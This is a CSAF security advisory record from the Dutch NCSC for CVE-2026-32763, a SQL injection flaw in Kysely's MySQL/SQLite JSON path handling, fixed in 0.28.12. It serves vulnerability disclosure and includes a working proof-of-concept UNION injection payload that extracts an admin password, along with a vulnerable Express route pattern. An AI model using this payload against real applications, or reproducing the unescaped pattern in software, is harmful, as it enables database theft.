{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-32763", "tracking": { "current_release_date": "2026-03-26T12:21:14.010448Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-32763", "initial_release_date": "2026-03-18T13:39:37.540874Z", "revision_history": [ { "date": "2026-03-18T13:39:37.540874Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-18T13:39:40.922125Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-19T11:40:15.378826Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-20T18:21:16.063637Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-20T18:21:19.544988Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:21:46.603374Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-20T18:21:48.802597Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:22:45.412593Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-20T21:41:37.877604Z", "number": "9", "summary": "References created (1)." }, { "date": "2026-03-20T21:59:42.061891Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T21:59:45.051377Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-21T04:39:48.733897Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-21T13:47:23.100662Z", "number": "13", "summary": "References removed (1)." }, { "date": "2026-03-22T00:51:48.627094Z", "number": "14", "summary": "References created (1)." }, { "date": "2026-03-22T11:24:51.439896Z", "number": "15", "summary": "References removed (1)." }, { "date": "2026-03-23T00:53:58.562599Z", "number": "16", "summary": "References created (1)." }, { "date": "2026-03-23T05:15:55.095215Z", "number": "17", "summary": "References removed (1)." }, { "date": "2026-03-24T20:56:19.507256Z", "number": "18", "summary": "References created (1)." }, { "date": "2026-03-26T12:21:08.274611Z", "number": "19", "summary": "References created (1)." } ], "status": "interim", "version": "19" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0.26.0|<0.28.12", "product": { "name": "vers:unknown/>=0.26.0|<0.28.12", "product_id": "CSAFPID-5874010" } } ], "category": "product_name", "name": "kysely" } ], "category": "vendor", "name": "kysely-org" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-32763", "cwe": { "id": "CWE-89", "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')" }, "notes": [ { "category": "description", "text": "### Summary\n\nKysely through 0.28.11 has a SQL injection vulnerability in JSON path compilation for MySQL and SQLite dialects. The `visitJSONPathLeg()` function appends user-controlled values from `.key()` and `.at()` directly into single-quoted JSON path string literals (`'$.key'`) without escaping single quotes. An attacker can break out of the JSON path string context and inject arbitrary SQL.\n\nThis is inconsistent with `sanitizeIdentifier()`, which properly doubles delimiter characters for identifiers — both are non-parameterizable SQL constructs requiring manual escaping, but only identifiers are protected.\n\n### Details\n\n`visitJSONPath()` wraps JSON path in single quotes (`'$...'`), and `visitJSONPathLeg()` appends each key/index value via `this.append(String(node.value))` with no sanitization:\n\n```javascript\n// dist/cjs/query-compiler/default-query-compiler.js\nvisitJSONPath(node) {\n if (node.inOperator) {\n this.visitNode(node.inOperator);\n }\n this.append(\"'$\");\n for (const pathLeg of node.pathLegs) {\n this.visitNode(pathLeg); // Each leg appended without escaping\n }\n this.append(\"'\");\n}\nvisitJSONPathLeg(node) {\n const isArrayLocation = node.type === 'ArrayLocation';\n this.append(isArrayLocation ? '[' : '.');\n this.append(String(node.value)); // <-- NO single quote escaping\n if (isArrayLocation) {\n this.append(']');\n }\n}\n```\n\nContrast with `sanitizeIdentifier()` in the same file, which properly doubles delimiter characters:\n\n```javascript\nsanitizeIdentifier(identifier) {\n const leftWrap = this.getLeftIdentifierWrapper();\n const rightWrap = this.getRightIdentifierWrapper();\n let sanitized = '';\n for (const c of identifier) {\n sanitized += c;\n if (c === leftWrap) { sanitized += leftWrap; }\n else if (c === rightWrap) { sanitized += rightWrap; }\n }\n return sanitized;\n}\n```\n\nBoth identifiers and JSON path keys are non-parameterizable SQL constructs that require manual escaping. Identifiers are protected; JSON path values are not.\n\nPostgreSQL is **not affected**. The branching happens in `JSONPathBuilder.#createBuilderWithPathLeg()` (`json-path-builder.js`):\n\n- **MySQL/SQLite** operators (`->$`, `->>$`) produce a `JSONPathNode` traversal → `visitJSONPathLeg()` concatenates the key directly into a single-quoted JSON path string (`'$.key'`) — **vulnerable**, no escaping.\n- **PostgreSQL** operators (`->`, `->>`) produce a `JSONOperatorChainNode` traversal → `ValueNode.createImmediate(value)` → `appendImmediateValue()` → `appendStringLiteral()` → **`sanitizeStringLiteral()` doubles single quotes** (`'` → `''`), generating chained operators (`\"col\"->>'city'`). Injection payload becomes a harmless string literal.\n\nSame `.key()` call, different internal node creation depending on the operator type. The PostgreSQL path reuses the existing string literal sanitization; the MySQL/SQLite JSON path construction bypasses it entirely.\n\n### PoC\n\nEnd-to-end proof against a real SQLite database (Kysely 0.28.11 + better-sqlite3):\n\n```javascript\nconst Database = require('better-sqlite3');\nconst { Kysely, SqliteDialect } = require('kysely');\n\nconst sqliteDb = new Database(':memory:');\nsqliteDb.exec(`\n CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, profile TEXT);\n INSERT INTO users VALUES (1, 'alice', '{\"city\": \"Seoul\", \"age\": 30}');\n INSERT INTO users VALUES (2, 'bob', '{\"city\": \"Tokyo\", \"age\": 25}');\n CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT);\n INSERT INTO admin VALUES (1, 'SUPER_SECRET_PASSWORD_123');\n`);\n\nconst db = new Kysely({ dialect: new SqliteDialect({ database: sqliteDb }) });\n\nasync function main() {\n // Safe usage\n const safe = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key('city').as('city'))\n .execute();\n console.log(\"Safe:\", safe);\n // [ { city: 'Seoul' }, { city: 'Tokyo' } ]\n\n // Injection via .key() — exfiltrate admin password\n const malicious = `city' as \"city\" from \"users\" UNION SELECT password FROM admin -- `;\n const attack = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key(malicious).as('city'))\n .execute();\n console.log(\"Injected:\", attack);\n // [ { city: 'SUPER_SECRET_PASSWORD_123' }, { city: 'Seoul' }, { city: 'Tokyo' } ]\n}\nmain();\n```\n\nThe payload includes `as \"city\" from \"users\"` to complete the first SELECT before the UNION. The `--` comments out the trailing `' as \"city\" from \"users\"` appended by Kysely.\n\nGenerated SQL:\n\n```sql\nselect \"profile\"->>'$.city' as \"city\" from \"users\" UNION SELECT password FROM admin -- ' as \"city\" from \"users\"\n```\n\n### Realistic application pattern\n\n```javascript\napp.get('/api/products', async (req, res) => {\n const field = req.query.field || 'name';\n const products = await db\n .selectFrom('products')\n .select(eb => eb.ref('metadata', '->>$').key(field).as('value'))\n .execute();\n res.json(products);\n});\n```\n\nDynamic JSON field selection is a common pattern in search APIs, GraphQL resolvers, and admin panels that expose JSON column data.\n\n### Suggested fix\n\nEscape single quotes in JSON path values within `visitJSONPathLeg()`, similar to how `sanitizeIdentifier()` doubles delimiter characters. Alternatively, validate that JSON path keys contain only safe characters. The direction of the fix is left to the maintainers.\n\n### Impact\n\n**SQL Injection (CWE-89)** — An attacker can inject arbitrary SQL via crafted JSON key names passed to `.key()` or `.at()`, enabling UNION-based data exfiltration from any database table. MySQL and SQLite dialects are affected. PostgreSQL is not affected.", "title": "github - https://github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "description", "text": "### Summary\n\nKysely through 0.28.11 has a SQL injection vulnerability in JSON path compilation for MySQL and SQLite dialects. The `visitJSONPathLeg()` function appends user-controlled values from `.key()` and `.at()` directly into single-quoted JSON path string literals (`'$.key'`) without escaping single quotes. An attacker can break out of the JSON path string context and inject arbitrary SQL.\n\nThis is inconsistent with `sanitizeIdentifier()`, which properly doubles delimiter characters for identifiers — both are non-parameterizable SQL constructs requiring manual escaping, but only identifiers are protected.\n\n### Details\n\n`visitJSONPath()` wraps JSON path in single quotes (`'$...'`), and `visitJSONPathLeg()` appends each key/index value via `this.append(String(node.value))` with no sanitization:\n\n```javascript\n// dist/cjs/query-compiler/default-query-compiler.js\nvisitJSONPath(node) {\n if (node.inOperator) {\n this.visitNode(node.inOperator);\n }\n this.append(\"'$\");\n for (const pathLeg of node.pathLegs) {\n this.visitNode(pathLeg); // Each leg appended without escaping\n }\n this.append(\"'\");\n}\nvisitJSONPathLeg(node) {\n const isArrayLocation = node.type === 'ArrayLocation';\n this.append(isArrayLocation ? '[' : '.');\n this.append(String(node.value)); // <-- NO single quote escaping\n if (isArrayLocation) {\n this.append(']');\n }\n}\n```\n\nContrast with `sanitizeIdentifier()` in the same file, which properly doubles delimiter characters:\n\n```javascript\nsanitizeIdentifier(identifier) {\n const leftWrap = this.getLeftIdentifierWrapper();\n const rightWrap = this.getRightIdentifierWrapper();\n let sanitized = '';\n for (const c of identifier) {\n sanitized += c;\n if (c === leftWrap) { sanitized += leftWrap; }\n else if (c === rightWrap) { sanitized += rightWrap; }\n }\n return sanitized;\n}\n```\n\nBoth identifiers and JSON path keys are non-parameterizable SQL constructs that require manual escaping. Identifiers are protected; JSON path values are not.\n\nPostgreSQL is **not affected**. The branching happens in `JSONPathBuilder.#createBuilderWithPathLeg()` (`json-path-builder.js`):\n\n- **MySQL/SQLite** operators (`->$`, `->>$`) produce a `JSONPathNode` traversal → `visitJSONPathLeg()` concatenates the key directly into a single-quoted JSON path string (`'$.key'`) — **vulnerable**, no escaping.\n- **PostgreSQL** operators (`->`, `->>`) produce a `JSONOperatorChainNode` traversal → `ValueNode.createImmediate(value)` → `appendImmediateValue()` → `appendStringLiteral()` → **`sanitizeStringLiteral()` doubles single quotes** (`'` → `''`), generating chained operators (`\"col\"->>'city'`). Injection payload becomes a harmless string literal.\n\nSame `.key()` call, different internal node creation depending on the operator type. The PostgreSQL path reuses the existing string literal sanitization; the MySQL/SQLite JSON path construction bypasses it entirely.\n\n### PoC\n\nEnd-to-end proof against a real SQLite database (Kysely 0.28.11 + better-sqlite3):\n\n```javascript\nconst Database = require('better-sqlite3');\nconst { Kysely, SqliteDialect } = require('kysely');\n\nconst sqliteDb = new Database(':memory:');\nsqliteDb.exec(`\n CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, profile TEXT);\n INSERT INTO users VALUES (1, 'alice', '{\"city\": \"Seoul\", \"age\": 30}');\n INSERT INTO users VALUES (2, 'bob', '{\"city\": \"Tokyo\", \"age\": 25}');\n CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT);\n INSERT INTO admin VALUES (1, 'SUPER_SECRET_PASSWORD_123');\n`);\n\nconst db = new Kysely({ dialect: new SqliteDialect({ database: sqliteDb }) });\n\nasync function main() {\n // Safe usage\n const safe = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key('city').as('city'))\n .execute();\n console.log(\"Safe:\", safe);\n // [ { city: 'Seoul' }, { city: 'Tokyo' } ]\n\n // Injection via .key() — exfiltrate admin password\n const malicious = `city' as \"city\" from \"users\" UNION SELECT password FROM admin -- `;\n const attack = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key(malicious).as('city'))\n .execute();\n console.log(\"Injected:\", attack);\n // [ { city: 'SUPER_SECRET_PASSWORD_123' }, { city: 'Seoul' }, { city: 'Tokyo' } ]\n}\nmain();\n```\n\nThe payload includes `as \"city\" from \"users\"` to complete the first SELECT before the UNION. The `--` comments out the trailing `' as \"city\" from \"users\"` appended by Kysely.\n\nGenerated SQL:\n\n```sql\nselect \"profile\"->>'$.city' as \"city\" from \"users\" UNION SELECT password FROM admin -- ' as \"city\" from \"users\"\n```\n\n### Realistic application pattern\n\n```javascript\napp.get('/api/products', async (req, res) => {\n const field = req.query.field || 'name';\n const products = await db\n .selectFrom('products')\n .select(eb => eb.ref('metadata', '->>$').key(field).as('value'))\n .execute();\n res.json(products);\n});\n```\n\nDynamic JSON field selection is a common pattern in search APIs, GraphQL resolvers, and admin panels that expose JSON column data.\n\n### Suggested fix\n\nEscape single quotes in JSON path values within `visitJSONPathLeg()`, similar to how `sanitizeIdentifier()` doubles delimiter characters. Alternatively, validate that JSON path keys contain only safe characters. The direction of the fix is left to the maintainers.\n\n### Impact\n\n**SQL Injection (CWE-89)** — An attacker can inject arbitrary SQL via crafted JSON key names passed to `.key()` or `.at()`, enabling UNION-based data exfiltration from any database table. MySQL and SQLite dialects are affected. PostgreSQL is not affected.", "title": "github - https://api.github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "description", "text": "Kysely is a type-safe TypeScript SQL query builder. Versions up to and including 0.28.11 has a SQL injection vulnerability in JSON path compilation for MySQL and SQLite dialects. The `visitJSONPathLeg()` function appends user-controlled values from `.key()` and `.at()` directly into single-quoted JSON path string literals (`'$.key'`) without escaping single quotes. An attacker can break out of the JSON path string context and inject arbitrary SQL. This is inconsistent with `sanitizeIdentifier()`, which properly doubles delimiter characters for identifiers — both are non-parameterizable SQL constructs requiring manual escaping, but only identifiers are protected. Version 0.28.12 fixes the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32763.json" }, { "category": "description", "text": "Kysely is a type-safe TypeScript SQL query builder. Versions up to and including 0.28.11 has a SQL injection vulnerability in JSON path compilation for MySQL and SQLite dialects. The `visitJSONPathLeg()` function appends user-controlled values from `.key()` and `.at()` directly into single-quoted JSON path string literals (`'$.key'`) without escaping single quotes. An attacker can break out of the JSON path string context and inject arbitrary SQL. This is inconsistent with `sanitizeIdentifier()`, which properly doubles delimiter characters for identifiers — both are non-parameterizable SQL constructs requiring manual escaping, but only identifiers are protected. Version 0.28.12 fixes the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32763" }, { "category": "description", "text": "### Summary\n\nKysely through 0.28.11 has a SQL injection vulnerability in JSON path compilation for MySQL and SQLite dialects. The `visitJSONPathLeg()` function appends user-controlled values from `.key()` and `.at()` directly into single-quoted JSON path string literals (`'$.key'`) without escaping single quotes. An attacker can break out of the JSON path string context and inject arbitrary SQL.\n\nThis is inconsistent with `sanitizeIdentifier()`, which properly doubles delimiter characters for identifiers — both are non-parameterizable SQL constructs requiring manual escaping, but only identifiers are protected.\n\n### Details\n\n`visitJSONPath()` wraps JSON path in single quotes (`'$...'`), and `visitJSONPathLeg()` appends each key/index value via `this.append(String(node.value))` with no sanitization:\n\n```javascript\n// dist/cjs/query-compiler/default-query-compiler.js\nvisitJSONPath(node) {\n if (node.inOperator) {\n this.visitNode(node.inOperator);\n }\n this.append(\"'$\");\n for (const pathLeg of node.pathLegs) {\n this.visitNode(pathLeg); // Each leg appended without escaping\n }\n this.append(\"'\");\n}\nvisitJSONPathLeg(node) {\n const isArrayLocation = node.type === 'ArrayLocation';\n this.append(isArrayLocation ? '[' : '.');\n this.append(String(node.value)); // <-- NO single quote escaping\n if (isArrayLocation) {\n this.append(']');\n }\n}\n```\n\nContrast with `sanitizeIdentifier()` in the same file, which properly doubles delimiter characters:\n\n```javascript\nsanitizeIdentifier(identifier) {\n const leftWrap = this.getLeftIdentifierWrapper();\n const rightWrap = this.getRightIdentifierWrapper();\n let sanitized = '';\n for (const c of identifier) {\n sanitized += c;\n if (c === leftWrap) { sanitized += leftWrap; }\n else if (c === rightWrap) { sanitized += rightWrap; }\n }\n return sanitized;\n}\n```\n\nBoth identifiers and JSON path keys are non-parameterizable SQL constructs that require manual escaping. Identifiers are protected; JSON path values are not.\n\nPostgreSQL is **not affected**. The branching happens in `JSONPathBuilder.#createBuilderWithPathLeg()` (`json-path-builder.js`):\n\n- **MySQL/SQLite** operators (`->$`, `->>$`) produce a `JSONPathNode` traversal → `visitJSONPathLeg()` concatenates the key directly into a single-quoted JSON path string (`'$.key'`) — **vulnerable**, no escaping.\n- **PostgreSQL** operators (`->`, `->>`) produce a `JSONOperatorChainNode` traversal → `ValueNode.createImmediate(value)` → `appendImmediateValue()` → `appendStringLiteral()` → **`sanitizeStringLiteral()` doubles single quotes** (`'` → `''`), generating chained operators (`\"col\"->>'city'`). Injection payload becomes a harmless string literal.\n\nSame `.key()` call, different internal node creation depending on the operator type. The PostgreSQL path reuses the existing string literal sanitization; the MySQL/SQLite JSON path construction bypasses it entirely.\n\n### PoC\n\nEnd-to-end proof against a real SQLite database (Kysely 0.28.11 + better-sqlite3):\n\n```javascript\nconst Database = require('better-sqlite3');\nconst { Kysely, SqliteDialect } = require('kysely');\n\nconst sqliteDb = new Database(':memory:');\nsqliteDb.exec(`\n CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, profile TEXT);\n INSERT INTO users VALUES (1, 'alice', '{\"city\": \"Seoul\", \"age\": 30}');\n INSERT INTO users VALUES (2, 'bob', '{\"city\": \"Tokyo\", \"age\": 25}');\n CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT);\n INSERT INTO admin VALUES (1, 'SUPER_SECRET_PASSWORD_123');\n`);\n\nconst db = new Kysely({ dialect: new SqliteDialect({ database: sqliteDb }) });\n\nasync function main() {\n // Safe usage\n const safe = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key('city').as('city'))\n .execute();\n console.log(\"Safe:\", safe);\n // [ { city: 'Seoul' }, { city: 'Tokyo' } ]\n\n // Injection via .key() — exfiltrate admin password\n const malicious = `city' as \"city\" from \"users\" UNION SELECT password FROM admin -- `;\n const attack = await db\n .selectFrom('users')\n .select(eb => eb.ref('profile', '->>$').key(malicious).as('city'))\n .execute();\n console.log(\"Injected:\", attack);\n // [ { city: 'SUPER_SECRET_PASSWORD_123' }, { city: 'Seoul' }, { city: 'Tokyo' } ]\n}\nmain();\n```\n\nThe payload includes `as \"city\" from \"users\"` to complete the first SELECT before the UNION. The `--` comments out the trailing `' as \"city\" from \"users\"` appended by Kysely.\n\nGenerated SQL:\n\n```sql\nselect \"profile\"->>'$.city' as \"city\" from \"users\" UNION SELECT password FROM admin -- ' as \"city\" from \"users\"\n```\n\n### Realistic application pattern\n\n```javascript\napp.get('/api/products', async (req, res) => {\n const field = req.query.field || 'name';\n const products = await db\n .selectFrom('products')\n .select(eb => eb.ref('metadata', '->>$').key(field).as('value'))\n .execute();\n res.json(products);\n});\n```\n\nDynamic JSON field selection is a common pattern in search APIs, GraphQL resolvers, and admin panels that expose JSON column data.\n\n### Suggested fix\n\nEscape single quotes in JSON path values within `visitJSONPathLeg()`, similar to how `sanitizeIdentifier()` doubles delimiter characters. Alternatively, validate that JSON path keys contain only safe characters. The direction of the fix is left to the maintainers.\n\n### Impact\n\n**SQL Injection (CWE-89)** — An attacker can inject arbitrary SQL via crafted JSON key names passed to `.key()` or `.at()`, enabling UNION-based data exfiltration from any database table. MySQL and SQLite dialects are affected. PostgreSQL is not affected.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wmrf-hv6w-mr66.json?alt=media" }, { "category": "other", "text": "0.00033", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "There is cwe data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5874010" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32763.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32763" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wmrf-hv6w-mr66.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/kysely-org/kysely/security/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/kysely-org/kysely/commit/0a602bff2f442f6c26d5e047ca8f8715179f6d24" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/kysely-org/kysely/releases/tag/v0.28.12" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wmrf-hv6w-mr66" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32763" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5874010" ] } ], "title": "CVE-2026-32763" } ] }